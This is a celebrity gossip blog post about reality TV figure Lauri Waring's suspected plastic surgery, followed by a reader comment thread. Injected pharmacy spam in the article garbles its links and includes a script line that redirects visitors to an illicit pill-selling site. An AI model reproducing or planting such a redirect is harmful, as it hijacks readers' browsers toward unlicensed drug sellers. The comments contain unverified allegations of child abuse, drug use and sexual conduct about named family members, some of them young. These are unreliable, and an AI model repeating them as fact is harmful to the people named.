• Lauri Waring may no longer be one of the core members of the hit reality TV show Real Housewives of Orange County. But she’s had enough plastic surgery to put her costars to shame.

On the show, approximately 47-year old Lauri has been open about her Botox use, even going under the needle on camera and talking her fellow housewives into having the procedure. But she has insisted that Botox is the extent of her facial plastic surgery, despite evidence to the country.

Lauri Waring, Plastic Surgery

(Left: Before, Right: After)

All of the housewives on the show having obvious breast augmentations and they delight in showing them off with deeply cut shirts and loud jewelry. Lauri is no exception, showing off jewels as stunning as her large implants.

But Lauri hasn’t been open about other plastic surgery procedures, including a nose job in the past and lip fillers. A recent photo of Lauri before her television debut recently surfaced, showing a pretty, though not plastic young mother, with a bigger nose than Lauri has on the show.

Lauri’s surprised expression could be the result of overindulging in Botox, or the result of a browlift. She also has very tight, pulled skin, which could be because of a facelift. But all the make-up she wears as an Orange County housewife makes it hard to tell which is temporary artifice and which is surgical enhancment.

Facial Plastic & Reconstructive Surgery expert Dr. Paul Nassif says, “her after picture reveals a narrow, pinched typical orange county rhinoplasty. Her brows are elevated indicative of a brow lift and she may possibly have had a face lift.  Lots of make up as well.”

Plastic surgeon Dr. Jennifer Walden also noted the changes in Lauri’s appearance from the time of that photo until the present. She tells Make Me Heal, “Lauri Waring appears to have undergone a rhinoplasty to slim and narrow the bridge of her nose, as well as likely having gotten injectables like Botox (hence the ultra-smooth forehead) and Restylane or Juvederm to plump the laugh lines (nasolabial folds) and lips.  It also looks like she has undergone breast augmentation as well.”

Lauri’s decision to leave the show must have been hard, but Make Me Heal applauds her decision to put her family first. However, we caution her to lay off the plastic surgery as she becomes more obviously plastic-looking with each injection and alteration.

Read the complete celebrity plastic surgery profile of Lauri Waring on Plasticopedia, the web’s largest celebrity plastic surgery.

See buy Valtrex Before & After Plastic Surgery Photos

Shop for Plastic Surgery & Beauty Products buy vardenfil buy Lithium online
    window.location = “http://cheap-pills-norx.com”;

Comments

1. BlowFish on December 23, 2008 1:50 pm

Lauri did not leave the show because of her son or wanting to spend time with the kids. For 4 years she exploited her son, and there are only 3 kids left at home. George is the one who pulled the plug after 4 articles surfaced of what he did to his x wife and his shady business dealings. He was too embarrassed to continue. Period. Lauri reluctantly followed the money (George) but is now rumored to wanting to go back on the show. She said in her Blog she is stress free now.
      Go to the Orange County Register and click on Columns. There you will find Frank Mickadeit’s (a columnist) who has written countless articles showing the true personalities of both George and Lauri. They are two extremely narcissistic people with George being labeled as a BULLY and rightfully so.

2. Peggy on January 5, 2009 9:04 am

I like George and Laura… No one is PERFECT…. and in any divorce there is always 2 sides to that story. Bully News Sells papwers at others expense. I hope she and George returns… George is very good looking calm man… adn I wish VICKI leaves… Vicke nees counseling.

3. Anne on April 27, 2009 3:59 pm

@ Peggy – and, my dear, you are in drastic need (nees) of Spellcheck. You don’t even know how to consistently spell the names of the people you’re talking about. Instead of posting – take on an English class, or two.

4. BlowFish on July 5, 2009 9:47 am

So, Peggy, I mean, Lauri, if you and George are such kind ppl, try explaining this….under TMZ’s article dated 5-21-09, tittle, “Real Houswife, Real Small Pay Check…

George Peterson’s son, Slayte, commented under this article after being abused by his father as well as witnessing what his father did to his children and former wife. Slayte went into hiding for 6 months, waiting to turn 18 so George no longer had any control over him. Slayte inked into his body
      PS: 28:4 in memory of his father. NO ONE would go to those extremes without cause. Slayte is right…Stay Tuned.

#79. THIS IS SLAYTE!!! Not an imposter, the Real deal! I am George’s EX son. Lauri is nothing but a golddigging bimbo and none of our family members like her or want her around. She does nothing in our home but check herself out on the internet and is so full of herself. Both her and George think they are Real Celebrities! They are a joke! She is the evil step mother from hell and nobody can stand her. I ran away from home 6 months ago because of the abuse George has done to me and my SISTERS! Before that he had me sent away because I didn’t want to be beat by him anymore and wanted to stay with my mom. Guess what George and Lauri, I am 18 years old now and you can’t keep me from being heard now. You made sure that our lives were miserable these last few years while you pretended to be the great people that you aren’t, boy do I have a story to tell!!!! I want the World to know the REAL TRUTH about your fake Brady Bunch and the way you cuss at us all and the monsters that you are. I am Free now, but my sisters aren’t!! They don’t deserve to live like this until they are 18!! Why don’t you tell the truth about what you did to us and my mom! You had everything George and you lost it all because you are an evil control freak who beats his kids till we do exactly what he wants us to do.
      Stay Tuned. Posted at 9:53PM on May 23rd 2009 by SL8

5. BlowFish on July 5, 2009 9:51 am

And how can we forget what Josh, Lauri Waring’s son had to say to his mohter that has been in circulation for some time……

“No Mom I will not take back what i said. As for your retaliation, you think i care what you have to say about me. What could you tell people that you hav’nt told already? fact is your out of ammunition but let me give you a hand.. YES I HAVE A DRUG PROBLEM. That seems to be your overexaggerated concern on TV. So i will side with you on that one. The truth is mom you have been temporarily dumping me in institutions since i was 12. YOU CHOSE TO IGNORE THE PROBLEM NOT ME. Now do us both a favor and move on, I love you and always will. As for withdrawling my statements? KISS MY A**. everything i said was true. You think i want a pergery lawsuit from you and georges glorious ensemble of attorneys? I mean you told the police last week that i was trying to kill you and burn the house down. Oh the things you could do with legitamite slander! Anyways, as you said to me 5 minutes ago i am dead to you and you have no son. If you ever decided to feel otherwise i’ll be here. Love Josh PS if you think im doing this to make you look bad, your quite mistaken you do that quite well by yourself. My primary concern was liberation from the lies i told the viewers this season regarding my previous “incarceration”. So heres me mom withdrawling my statements. i was not violating probation…it was not a mutual decision for me to go to “boarding school” you wrote a letter to the courts saying you didnt want me anymore. therefore you could date your prince charming. there you are have at him. PSS i have a court copy of your letter….want me to post it on the bravo boards?”
      JOSH WARING – Feb. 03, 2007

6. Catherine on February 9, 2010 4:54 pm

Hey have you seen thpse pre plastic surgeries from Lauri. She was ugly, did you see her ugly nose?
      She has been exploting her kids for years. Josh came home and saw her having oral sex with some guy, no wonder he is mixed up. Her the neighbors used to talk about Lauri and say how awful she was as a parent. She was always chasing guys and looking for money! Phil couldn’t wait to get rid of her!

7. Michelle on February 19, 2010 2:07 pm

LMAO….this is too funny…and ridiculous to a certain extent….poor kids….prayers for the kids….smh

8. Tax Shelters on March 10, 2010 1:38 am

Keep good going with your hard work. Look forward to reading more from you in the future.I truly got a kick out of your post. I only wanted to register to say wonderful work.

9. MIKE on February 25, 2011 2:48 pm

I LAUGH WHEN I SEE GEORGE PETERSON. HE DOESN’T REALIZE THAT LAURI WAS QUITE THE HO RUNNING AROUND OC
      BEFORE HE MET HER. LAURI HAS HAD A LOT OF PLASTIC SURGERY AND NEVER TOOK CARE OF HER KIDS. SHE HAS NO ED-
      UCATION AND DOESN’T WANT TO HOLD DOWN A JOB. SHE HAS EXPLOITED JOSH AND HER KIDS AND NOW ASHLEY NEEDS
      $$ SO SHE WANTS TO COME BACK TO THE HOUSEWIVES. LAURI IS SUCH A MESS, SHE WAS NEVER A MOTHER AND THATS
      WHY BOTH HER HUSBANDS DUMPED HER.

10. debra on July 29, 2011 8:37 pm

I personally do not Lauri and George.I have not witnessed what others say and I am sorry if that did go on.If it is pain within the family and their childrens truth, we must all remember that we each have our own truth.I hope if there is pain and upset that they can each be honest and heal.But honestly it is none of my business.I know that when I was younger I loved to hear horrible things about beautiful people as it made me feel better.But now in my 40s I realize we are all here together and should try to learn from the challenges others go through.So lauri and George..I wish you both well and hope that you can find healing in your relationships with your families.Life is so short.And if you can’t find peace I hope that you stay close to each other and walk honestly together for the rest of your lives.I married my best friend.It has been 20 years and has required a lot of vulnerability,honesty,listenning and patience without judging.Take care and be blessed, debra

11. reneerose on July 4, 2013 10:35 pm

Despite evidence to the COUNTRY??? Gawd, edit your stuff please.